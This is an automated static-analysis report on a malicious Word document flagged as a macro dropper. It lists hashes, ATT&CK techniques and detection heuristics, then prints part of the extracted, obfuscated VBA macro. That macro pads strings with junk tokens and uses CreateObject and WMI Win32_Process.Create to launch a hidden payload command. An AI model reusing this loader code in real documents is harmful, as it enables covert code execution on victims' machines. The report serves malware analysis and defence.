Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 3ce0d9956b3bb9a2…

MALICIOUS

Office (OLE)

252.5 KB Created: 2019-11-01 14:23:00 Authoring application: Microsoft Office Word First seen: 2019-12-10
MD5: f26bbd97d3ef630c0b3d0591bbad287b SHA-1: 715a195e6c2ab67d6fc8a70386e4930cad0bb362 SHA-256: 3ce0d9956b3bb9a2fd83c98b261c88a3fa073b3d057cdb320ec3f0656f359bc6
282 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1059 Command and Scripting Interpreter

The sample is a malicious Office document containing obfuscated VBA macros. The macros utilize CreateObject and Shell functions, indicating an intent to download and execute a second-stage payload. The presence of an AutoOpen macro and the ClamAV detection further support its malicious nature.

Heuristics 8

  • ClamAV: Doc.Dropper.Generic-7369685-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Generic-7369685-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 25461 bytes
SHA-256: cfa0630b808fbc4b0a4e655dc2febeae413bcfb643f46bcfd5c4f2ae3a57ae76
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Tvbudqkxtvvwo"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Aaczuckyirufj, 0, 0, MSForms, TextBox"
Attribute VB_Control = "Fhlxnzqapp, 1, 1, MSForms, TextBox"
Attribute VB_Control = "Qdkbfetcg, 2, 2, MSForms, TextBox"
Attribute VB_Control = "Iriryzdbuqoib, 3, 3, MSForms, TextBox"
Attribute VB_Control = "Rkojsmhqsnk, 4, 4, MSForms, TextBox"
Attribute VB_Control = "Knyniegflo, 5, 5, MSForms, TextBox"
Attribute VB_Control = "Aydhpwljj, 6, 6, MSForms, TextBox"

Attribute VB_Name = "Nmzptvsq"
Function Movsnfzjjt()
On Error Resume Next
   Dim yYfxi()
ReDim yYfxi(2)
yYfxi(0) = 721
yYfxi(1) = 9
Dim QtHmNxFA, ktDZKFH, xHPGsNB
Dim ZWvcQEJDU, xdrPOAE
Dim GUFGK, PdtrW
   Dim HaXTHNCFd, GdwZnAgJ
Dim gEndHHDGG
Dim hslMD()
ReDim hslMD(3)
hslMD(0) = 2321
hslMD(1) = 3781
hslMD(2) = 8691
Dim YnJSgQH
Dim Qdmgvxqv()
   Dim aCBxHV()
ReDim aCBxHV(3)
aCBxHV(0) = 81
aCBxHV(1) = 91891
aCBxHV(2) = 147
Dim PqvGX()
ReDim PqvGX(2)
PqvGX(0) = 81
PqvGX(1) = 6
Dim XgWSNA()
ReDim XgWSNA(2)
XgWSNA(0) = 51
XgWSNA(1) = 98
Dim cilEA()
ReDim cilEA(3)
cilEA(0) = 6321
cilEA(1) = 71
cilEA(2) = 5364
ReDim Qdmgvxqv(3)
   Dim wzjDDAq
Dim BPZwE()
ReDim BPZwE(2)
BPZwE(0) = 81
BPZwE(1) = 2
Dim GymJCtBG, zmRIJE
Dim nTGEHB()
ReDim nTGEHB(2)
nTGEHB(0) = 14481
nTGEHB(1) = 7
Qdmgvxqv(0) = "owqjowqjwowqjowqjiowqjowqjnmowqjowqjgmtowqjowqjs:Wowqjowqjiowqj"
   Dim wnYyyCC()
ReDim wnYyyCC(2)
wnYyyCC(0) = 41
wnYyyCC(1) = 8
Dim PeJnF
Dim KWykXE()
ReDim KWykXE(2)
KWykXE(0) = 71
KWykXE(1) = 9
Dim xCiqA()
ReDim xCiqA(2)
xCiqA(0) = 21
xCiqA(1) = 6269
Qdmgvxqv(30 / 30) = "owqjnowqjowqj32owqj_owqjowqjProwqjowqjocowqjowqjowqjesowqjowqjsowqjowqj"
   Dim VjBuCGe
Dim jFrLB, bBNSG
Dim huGLubV()
ReDim huGLubV(2)
huGLubV(0) = 41
huGLubV(1) = 79
Dim zOMlDSQJF()
ReDim zOMlDSQJF(2)
zOMlDSQJF(0) = 9271
zOMlDSQJF(1) = 5050
Qdmgvxqv(1 + 1) = Tvbudqkxtvvwo.Fhlxnzqapp
   Dim YXIQAkB, yYbtNWj, cutFVxFDH
Dim QqxVJIBFC()
ReDim QqxVJIBFC(3)
QqxVJIBFC(0) = 51
QqxVJIBFC(1) = 161
QqxVJIBFC(2) = 4
Dim oIsxJECD()
ReDim oIsxJECD(2)
oIsxJECD(0) = 6431
oIsxJECD(1) = 3
Dim nPQrlGDhJ()
ReDim nPQrlGDhJ(3)
nPQrlGDhJ(0) = 81
nPQrlGDhJ(1) = 31
nPQrlGDhJ(2) = 59
Qdmgvxqv(15 / 5) = Cocqjzvsip(Cocqjzvsip(Cocqjzvsip(Tvbudqkxtvvwo.Iriryzdbuqoib + Tvbudqkxtvvwo.Knyniegflo)))
   Dim xsylJ, HERQcDE, CkTkEdH
Dim YpkUDAP, TxHUPA, AqkDH
Dim mhIeBFEz, fHBulzFI, SaRppHM
Dim BwzLxF()
ReDim BwzLxF(3)
BwzLxF(0) = 4681
BwzLxF(1) = 91
BwzLxF(2) = 94
Set Ypykihycnsm = CreateObject(Cocqjzvsip(Cocqjzvsip(Cocqjzvsip(Qdmgvxqv(1 + 1)))))
   Dim obTfGZCw()
ReDim obTfGZCw(3)
obTfGZCw(0) = 71
obTfGZCw(1) = 9961
obTfGZCw(2) = 589
Dim FLwXD()
ReDim FLwXD(2)
FLwXD(0) = 31
FLwXD(1) = 110
Dim bjpKB()
ReDim bjpKB(3)
bjpKB(0) = 2441
bjpKB(1) = 1071
bjpKB(2) = 9
Dim zmXOElc()
ReDim zmXOElc(2)
zmXOElc(0) = 71
zmXOElc(1) = 7
   Dim mAhdBUjB()
ReDim mAhdBUjB(2)
mAhdBUjB(0) = 41
mAhdBUjB(1) = 36
Dim PPFDDBJpw
Dim jycmMElM, wdVdiM, kpyAE
Dim ARQvEBSzE()
ReDim ARQvEBSzE(3)
ARQvEBSzE(0) = 81
ARQvEBSzE(1) = 3061
ARQvEBSzE(2) = 7
Set Iebnnwzcuvov = CreateObject(Cocqjzvsip(Cocqjzvsip(Cocqjzvsip(Qdmgvxqv(0) + Qdmgvxqv(30 / 30)))))
   Dim xgQwuJ()
ReDim xgQwuJ(3)
xgQwuJ(0) = 71
xgQwuJ(1) = 31
xgQwuJ(2) = 116
Dim cylBiAt()
ReDim cylBiAt(2)
cylBiAt(0) = 63081
cylBiAt(1) = 6
Dim OQFDGF()
ReDim OQFDGF(2)
OQFDGF(0) = 601
OQFDGF(1) = 81
Dim WlPHAIL, YlcTZC
Ypykihycnsm.ShowWindow = True And False
   Dim rlxHTy()
ReDim rlxHTy(2)
rlxHTy(0) = 1521
rlxHTy(1) = 7
Dim uotUI, oZlgFh, XPHrw
Dim zjsmBYGv()
ReDim zjsmBYGv(3)
zjsmBYGv(0) = 161
zjsmBYGv(1) = 111
zjsmBYGv(2) = 328
Dim IZAunOEb, ycMcCIT
Tbwrumyimnvw = Iebnnwzcuvov.Create(Qdmgvxqv(15 / 5), Skqazmud, Ypykihycnsm, Lxaqnnsiw)
   Dim vyLgDBqH()
ReDim vyLgDBqH(2)
vyLgDBqH(0) = 73541
vyLgDBqH(1) = 89
Dim CoyzgHGTO(
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.